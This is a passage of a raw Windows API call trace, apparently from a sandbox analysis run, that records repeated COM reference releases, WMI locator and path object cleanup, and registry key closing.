pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.095] IUnknown:Release (This=0x5515cc0) returned 0x2 [0267.095] IUnknown:Release (This=0x5515cc0) returned 0x1 [0267.095] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.095] IUnknown:Release (This=0x550d580) returned 0x2 [0267.095] IUnknown:Release (This=0x550d580) returned 0x1 [0267.096] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.096] IUnknown:Release (This=0x550d9d8) returned 0x2 [0267.096] IUnknown:Release (This=0x550d9d8) returned 0x1 [0267.096] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.096] IUnknown:Release (This=0x6717f0) returned 0x2 [0267.096] IUnknown:Release (This=0x6717f0) returned 0x1 [0267.096] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.096] IUnknown:Release (This=0x671988) returned 0x2 [0267.096] IUnknown:Release (This=0x671988) returned 0x1 [0267.096] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.096] IUnknown:Release (This=0x671fe8) returned 0x2 [0267.096] IUnknown:Release (This=0x671fe8) returned 0x1 [0267.096] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.096] IUnknown:Release (This=0x671b20) returned 0x2 [0267.096] IUnknown:Release (This=0x671b20) returned 0x1 [0267.096] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.096] IUnknown:Release (This=0x671cb8) returned 0x2 [0267.096] IUnknown:Release (This=0x671cb8) returned 0x1 [0267.096] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.096] IUnknown:Release (This=0x671e50) returned 0x2 [0267.096] IUnknown:Release (This=0x671e50) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x5518f68) returned 0x2 [0267.097] IUnknown:Release (This=0x5518f68) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x55185d8) returned 0x2 [0267.097] IUnknown:Release (This=0x55185d8) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x5518908) returned 0x2 [0267.097] IUnknown:Release (This=0x5518908) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x5518440) returned 0x2 [0267.097] IUnknown:Release (This=0x5518440) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x5518dd0) returned 0x2 [0267.097] IUnknown:Release (This=0x5518dd0) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x5518770) returned 0x2 [0267.097] IUnknown:Release (This=0x5518770) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x5519100) returned 0x2 [0267.097] IUnknown:Release (This=0x5519100) returned 0x1 [0267.097] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.097] IUnknown:Release (This=0x5518aa0) returned 0x2 [0267.097] IUnknown:Release (This=0x5518aa0) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x5518c38) returned 0x2 [0267.098] IUnknown:Release (This=0x5518c38) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x5520260) returned 0x2 [0267.098] IUnknown:Release (This=0x5520260) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x5520590) returned 0x2 [0267.098] IUnknown:Release (This=0x5520590) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x55200c8) returned 0x2 [0267.098] IUnknown:Release (This=0x55200c8) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x551f5a0) returned 0x2 [0267.098] IUnknown:Release (This=0x551f5a0) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x551ec10) returned 0x2 [0267.098] IUnknown:Release (This=0x551ec10) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x551fa68) returned 0x2 [0267.098] IUnknown:Release (This=0x551fa68) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x551eda8) returned 0x2 [0267.098] IUnknown:Release (This=0x551eda8) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.098] IUnknown:Release (This=0x551fd98) returned 0x2 [0267.098] IUnknown:Release (This=0x551fd98) returned 0x1 [0267.098] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551f738) returned 0x2 [0267.099] IUnknown:Release (This=0x551f738) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551ef40) returned 0x2 [0267.099] IUnknown:Release (This=0x551ef40) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551ff30) returned 0x2 [0267.099] IUnknown:Release (This=0x551ff30) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551f270) returned 0x2 [0267.099] IUnknown:Release (This=0x551f270) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551f0d8) returned 0x2 [0267.099] IUnknown:Release (This=0x551f0d8) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x55203f8) returned 0x2 [0267.099] IUnknown:Release (This=0x55203f8) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551f408) returned 0x2 [0267.099] IUnknown:Release (This=0x551f408) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551f8d0) returned 0x2 [0267.099] IUnknown:Release (This=0x551f8d0) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x551fc00) returned 0x2 [0267.099] IUnknown:Release (This=0x551fc00) returned 0x1 [0267.099] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.099] IUnknown:Release (This=0x5520728) returned 0x2 [0267.099] IUnknown:Release (This=0x5520728) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x55208c0) returned 0x2 [0267.100] IUnknown:Release (This=0x55208c0) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x5520a58) returned 0x2 [0267.100] IUnknown:Release (This=0x5520a58) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x552c368) returned 0x2 [0267.100] IUnknown:Release (This=0x552c368) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x552b1e0) returned 0x2 [0267.100] IUnknown:Release (This=0x552b1e0) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x552c830) returned 0x2 [0267.100] IUnknown:Release (This=0x552c830) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x552b510) returned 0x2 [0267.100] IUnknown:Release (This=0x552b510) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x552b840) returned 0x2 [0267.100] IUnknown:Release (This=0x552b840) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x552d028) returned 0x2 [0267.100] IUnknown:Release (This=0x552d028) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.100] IUnknown:Release (This=0x552ccf8) returned 0x2 [0267.100] IUnknown:Release (This=0x552ccf8) returned 0x1 [0267.100] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552c500) returned 0x2 [0267.101] IUnknown:Release (This=0x552c500) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552c698) returned 0x2 [0267.101] IUnknown:Release (This=0x552c698) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552b378) returned 0x2 [0267.101] IUnknown:Release (This=0x552b378) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552b6a8) returned 0x2 [0267.101] IUnknown:Release (This=0x552b6a8) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552c038) returned 0x2 [0267.101] IUnknown:Release (This=0x552c038) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552c1d0) returned 0x2 [0267.101] IUnknown:Release (This=0x552c1d0) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552bea0) returned 0x2 [0267.101] IUnknown:Release (This=0x552bea0) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552ce90) returned 0x2 [0267.101] IUnknown:Release (This=0x552ce90) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552b9d8) returned 0x2 [0267.101] IUnknown:Release (This=0x552b9d8) returned 0x1 [0267.101] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.101] IUnknown:Release (This=0x552bb70) returned 0x2 [0267.101] IUnknown:Release (This=0x552bb70) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x552bd08) returned 0x2 [0267.102] IUnknown:Release (This=0x552bd08) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x552c9c8) returned 0x2 [0267.102] IUnknown:Release (This=0x552c9c8) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x552cb60) returned 0x2 [0267.102] IUnknown:Release (This=0x552cb60) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x553adf8) returned 0x2 [0267.102] IUnknown:Release (This=0x553adf8) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x553b128) returned 0x2 [0267.102] IUnknown:Release (This=0x553b128) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x5539940) returned 0x2 [0267.102] IUnknown:Release (This=0x5539940) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x553a2d0) returned 0x2 [0267.102] IUnknown:Release (This=0x553a2d0) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.102] IUnknown:Release (This=0x553af90) returned 0x2 [0267.102] IUnknown:Release (This=0x553af90) returned 0x1 [0267.102] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x5539fa0) returned 0x2 [0267.103] IUnknown:Release (This=0x5539fa0) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x55392e0) returned 0x2 [0267.103] IUnknown:Release (This=0x55392e0) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x5539478) returned 0x2 [0267.103] IUnknown:Release (This=0x5539478) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x5539ad8) returned 0x2 [0267.103] IUnknown:Release (This=0x5539ad8) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x5539e08) returned 0x2 [0267.103] IUnknown:Release (This=0x5539e08) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x5539c70) returned 0x2 [0267.103] IUnknown:Release (This=0x5539c70) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x553aac8) returned 0x2 [0267.103] IUnknown:Release (This=0x553aac8) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x553a138) returned 0x2 [0267.103] IUnknown:Release (This=0x553a138) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x553a468) returned 0x2 [0267.103] IUnknown:Release (This=0x553a468) returned 0x1 [0267.103] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.103] IUnknown:Release (This=0x553a600) returned 0x2 [0267.104] IUnknown:Release (This=0x553a600) returned 0x1 [0267.104] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.104] IUnknown:Release (This=0x5539610) returned 0x2 [0267.104] IUnknown:Release (This=0x5539610) returned 0x1 [0267.104] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.104] WbemLocator:IUnknown:Release (This=0x54ba318) returned 0x1 [0267.104] WbemLocator:IUnknown:Release (This=0x54ba318) returned 0x0 [0267.104] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.104] WbemLocator:IUnknown:Release (This=0x66f270) returned 0x1 [0267.104] WbemLocator:IUnknown:Release (This=0x67f220) returned 0x0 [0267.106] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.106] WbemLocator:IUnknown:Release (This=0x54ba3a8) returned 0x1 [0267.106] WbemLocator:IUnknown:Release (This=0x54ba3a8) returned 0x0 [0267.106] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.106] WbemLocator:IUnknown:Release (This=0x66f870) returned 0x1 [0267.106] WbemLocator:IUnknown:Release (This=0x54b55e0) returned 0x0 [0267.107] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.107] WbemLocator:IUnknown:Release (This=0x54ba228) returned 0x1 [0267.107] WbemLocator:IUnknown:Release (This=0x54ba228) returned 0x0 [0267.107] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.107] WbemLocator:IUnknown:Release (This=0x66fb70) returned 0x1 [0267.107] WbemLocator:IUnknown:Release (This=0x54b56d0) returned 0x0 [0267.107] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.107] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x1 [0267.107] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x0 [0267.107] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.108] IUnknown:Release (This=0x55397a8) returned 0x2 [0267.108] IUnknown:Release (This=0x55397a8) returned 0x1 [0267.108] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.108] WbemLocator:IUnknown:Release (This=0x54ba408) returned 0x1 [0267.108] WbemLocator:IUnknown:Release (This=0x54ba408) returned 0x0 [0267.108] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.108] IUnknown:Release (This=0x553ac60) returned 0x2 [0267.108] IUnknown:Release (This=0x553ac60) returned 0x1 [0267.108] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.108] WbemLocator:IUnknown:Release (This=0x54ba548) returned 0x1 [0267.108] WbemLocator:IUnknown:Release (This=0x54ba548) returned 0x0 [0267.108] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.108] WbemLocator:IUnknown:Release (This=0x66fc70) returned 0x1 [0267.108] WbemLocator:IUnknown:Release (This=0x54b52c0) returned 0x0 [0267.108] CoGetContextToken (in: pToken=0x422fc30 | out: pToken=0x422fc30) returned 0x0 [0267.108] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.108] WbemDefPath:IUnknown:Release (This=0x6614e0) returned 0x1 [0267.109] WbemDefPath:IUnknown:Release (This=0x6614e0) returned 0x0 [0267.109] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.109] WbemDefPath:IUnknown:Release (This=0x55426d0) returned 0x1 [0267.109] WbemDefPath:IUnknown:Release (This=0x55426d0) returned 0x0 [0267.109] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.109] WbemDefPath:IUnknown:Release (This=0x5542200) returned 0x1 [0267.109] WbemDefPath:IUnknown:Release (This=0x5542200) returned 0x0 [0267.109] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.109] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x1 [0267.109] WbemDefPath:IUnknown:Release (This=0x5542350) returned 0x0 [0267.109] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0267.109] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x1 [0267.109] WbemDefPath:IUnknown:Release (This=0x5542510) returned 0x0 [0267.109] IUnknown:Release (This=0x553aac8) returned 0x0 [0267.109] IUnknown:Release (This=0x5539c70) returned 0x0 [0267.109] IUnknown:Release (This=0x5539e08) returned 0x0 [0267.110] IUnknown:Release (This=0x5539ad8) returned 0x0 [0267.110] IUnknown:Release (This=0x5539478) returned 0x0 [0267.110] IUnknown:Release (This=0x55392e0) returned 0x0 [0267.110] IUnknown:Release (This=0x5539fa0) returned 0x0 [0267.110] IUnknown:Release (This=0x553af90) returned 0x0 [0267.110] IUnknown:Release (This=0x553a2d0) returned 0x0 [0267.111] IUnknown:Release (This=0x5539940) returned 0x0 [0267.111] IUnknown:Release (This=0x553b128) returned 0x0 [0267.111] IUnknown:Release (This=0x553adf8) returned 0x0 [0267.111] IUnknown:Release (This=0x552cb60) returned 0x0 [0267.111] IUnknown:Release (This=0x552c9c8) returned 0x0 [0267.111] IUnknown:Release (This=0x552bd08) returned 0x0 [0267.111] IUnknown:Release (This=0x552bb70) returned 0x0 [0267.112] IUnknown:Release (This=0x552b9d8) returned 0x0 [0267.112] IUnknown:Release (This=0x552ce90) returned 0x0 [0267.112] IUnknown:Release (This=0x552bea0) returned 0x0 [0267.112] IUnknown:Release (This=0x552c1d0) returned 0x0 [0267.112] IUnknown:Release (This=0x552c038) returned 0x0 [0267.112] IUnknown:Release (This=0x552b6a8) returned 0x0 [0267.113] IUnknown:Release (This=0x552b378) returned 0x0 [0267.113] IUnknown:Release (This=0x552c698) returned 0x0 [0267.113] IUnknown:Release (This=0x552c500) returned 0x0 [0267.113] IUnknown:Release (This=0x552ccf8) returned 0x0 [0267.113] IUnknown:Release (This=0x552d028) returned 0x0 [0267.113] IUnknown:Release (This=0x552b840) returned 0x0 [0267.113] IUnknown:Release (This=0x552b510) returned 0x0 [0267.114] IUnknown:Release (This=0x552c830) returned 0x0 [0267.114] IUnknown:Release (This=0x552b1e0) returned 0x0 [0267.114] IUnknown:Release (This=0x552c368) returned 0x0 [0267.114] IUnknown:Release (This=0x5520a58) returned 0x0 [0267.114] IUnknown:Release (This=0x55208c0) returned 0x0 [0267.114] IUnknown:Release (This=0x5520728) returned 0x0 [0267.114] IUnknown:Release (This=0x551fc00) returned 0x0 [0267.115] IUnknown:Release (This=0x551f8d0) returned 0x0 [0267.115] IUnknown:Release (This=0x551f408) returned 0x0 [0267.115] IUnknown:Release (This=0x55203f8) returned 0x0 [0267.116] IUnknown:Release (This=0x551f0d8) returned 0x0 [0267.116] IUnknown:Release (This=0x551f270) returned 0x0 [0267.116] IUnknown:Release (This=0x551ff30) returned 0x0 [0267.116] IUnknown:Release (This=0x551ef40) returned 0x0 [0267.116] IUnknown:Release (This=0x551f738) returned 0x0 [0267.116] IUnknown:Release (This=0x551fd98) returned 0x0 [0267.117] IUnknown:Release (This=0x551eda8) returned 0x0 [0267.117] IUnknown:Release (This=0x551fa68) returned 0x0 [0267.117] IUnknown:Release (This=0x551ec10) returned 0x0 [0267.117] IUnknown:Release (This=0x551f5a0) returned 0x0 [0267.117] IUnknown:Release (This=0x55200c8) returned 0x0 [0267.117] IUnknown:Release (This=0x5520590) returned 0x0 [0267.118] IUnknown:Release (This=0x5520260) returned 0x0 [0267.118] IUnknown:Release (This=0x5518c38) returned 0x0 [0267.118] IUnknown:Release (This=0x5518aa0) returned 0x0 [0267.118] IUnknown:Release (This=0x5519100) returned 0x0 [0267.118] IUnknown:Release (This=0x5518770) returned 0x0 [0267.118] IUnknown:Release (This=0x5518dd0) returned 0x0 [0267.118] IUnknown:Release (This=0x5518440) returned 0x0 [0267.119] IUnknown:Release (This=0x5518908) returned 0x0 [0267.119] IUnknown:Release (This=0x55185d8) returned 0x0 [0267.119] IUnknown:Release (This=0x5518f68) returned 0x0 [0267.119] IUnknown:Release (This=0x671e50) returned 0x0 [0267.120] IUnknown:Release (This=0x671cb8) returned 0x0 [0267.120] IUnknown:Release (This=0x671b20) returned 0x0 [0267.120] IUnknown:Release (This=0x671fe8) returned 0x0 [0267.120] IUnknown:Release (This=0x671988) returned 0x0 [0267.120] IUnknown:Release (This=0x6717f0) returned 0x0 [0267.121] IUnknown:Release (This=0x550d9d8) returned 0x0 [0267.121] IUnknown:Release (This=0x550d580) returned 0x0 [0267.121] IUnknown:Release (This=0x5515cc0) returned 0x0 [0267.121] IUnknown:Release (This=0x6a0258) returned 0x0 [0267.121] IUnknown:Release (This=0x55156a0) returned 0x0 [0267.122] IUnknown:Release (This=0x6a07a0) returned 0x0 [0267.122] IUnknown:Release (This=0x550b280) returned 0x0 [0267.122] IUnknown:Release (This=0x550b5a0) returned 0x0 [0267.122] IUnknown:Release (This=0x550bc18) returned 0x0 [0267.122] IUnknown:Release (This=0x67fec8) returned 0x0 [0267.123] IUnknown:Release (This=0x6804a0) returned 0x0 [0267.123] IUnknown:Release (This=0x54bcc90) returned 0x0 [0267.123] IUnknown:Release (This=0x5fcf90) returned 0x0 [0267.123] IUnknown:Release (This=0x5d6ed0) returned 0x0 [0267.123] IUnknown:Release (This=0x553ac60) returned 0x0 [0267.124] IUnknown:Release (This=0x55397a8) returned 0x0 [0267.124] IUnknown:Release (This=0x5539610) returned 0x0 [0267.124] IUnknown:Release (This=0x553a600) returned 0x0 [0267.125] IUnknown:Release (This=0x553a468) returned 0x0 [0267.125] IUnknown:Release (This=0x553a138) returned 0x0 [0267.125] RegCloseKey (hKey=0x304) returned 0x0 [0267.125] RegCloseKey (hKey=0x340) returned 0x0 [0267.126] RegCloseKey (hKey=0x300) returned 0x0 [0281.646] CoGetContextToken (in: pToken=0x422fc30 | out: pToken=0x422fc30) returned 0x0 [0281.646] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.646] WbemLocator:IUnknown:Release (This=0x670570) returned 0x1 [0281.646] WbemLocator:IUnknown:Release (This=0x67f180) returned 0x0 [0281.647] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.647] IUnknown:Release (This=0x553aac8) returned 0x2 [0281.647] IUnknown:Release (This=0x553aac8) returned 0x1 [0281.647] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.647] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x1 [0281.647] WbemLocator:IUnknown:Release (This=0x54ba4b8) returned 0x0 [0281.647] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.647] WbemLocator:IUnknown:Release (This=0x66fd70) returned 0x1 [0281.647] WbemLocator:IUnknown:Release (This=0x54b5540) returned 0x0 [0281.648] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.648] IUnknown:Release (This=0x553a468) returned 0x2 [0281.648] IUnknown:Release (This=0x553a468) returned 0x1 [0281.648] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.648] WbemLocator:IUnknown:Release (This=0x66f970) returned 0x1 [0281.648] WbemLocator:IUnknown:Release (This=0x54b5130) returned 0x0 [0281.649] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.649] WbemLocator:IUnknown:Release (This=0x54ba3c8) returned 0x1 [0281.649] WbemLocator:IUnknown:Release (This=0x54ba3c8) returned 0x0 [0281.649] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.649] IUnknown:Release (This=0x5539478) returned 0x2 [0281.649] IUnknown:Release (This=0x5539478) returned 0x1 [0281.649] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.649] WbemLocator:IUnknown:Release (This=0x54ba4f8) returned 0x1 [0281.649] WbemLocator:IUnknown:Release (This=0x54ba4f8) returned 0x0 [0281.649] CoGetContextToken (in: pToken=0x422fc30 | out: pToken=0x422fc30) returned 0x0 [0281.649] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.649] WbemDefPath:IUnknown:Release (This=0x6616a0) returned 0x1 [0281.649] WbemDefPath:IUnknown:Release (This=0x6616a0) returned 0x0 [0281.649] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.649] WbemDefPath:IUnknown:Release (This=0x661320) returned 0x1 [0281.649] WbemDefPath:IUnknown:Release (This=0x661320) returned 0x0 [0281.649] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.649] WbemDefPath:IUnknown:Release (This=0x661860) returned 0x1 [0281.649] WbemDefPath:IUnknown:Release (This=0x661860) returned 0x0 [0281.649] CoGetContextToken (in: pToken=0x422fbb8 | out: pToken=0x422fbb8) returned 0x0 [0281.649] WbemDefPath:IUnknown:Release (This=0x661470) returned 0x1 [0281.649] WbemDefPath:IUnknown:Release (This=0x661470) returned 0x0 [0281.650] CoGetContextToken 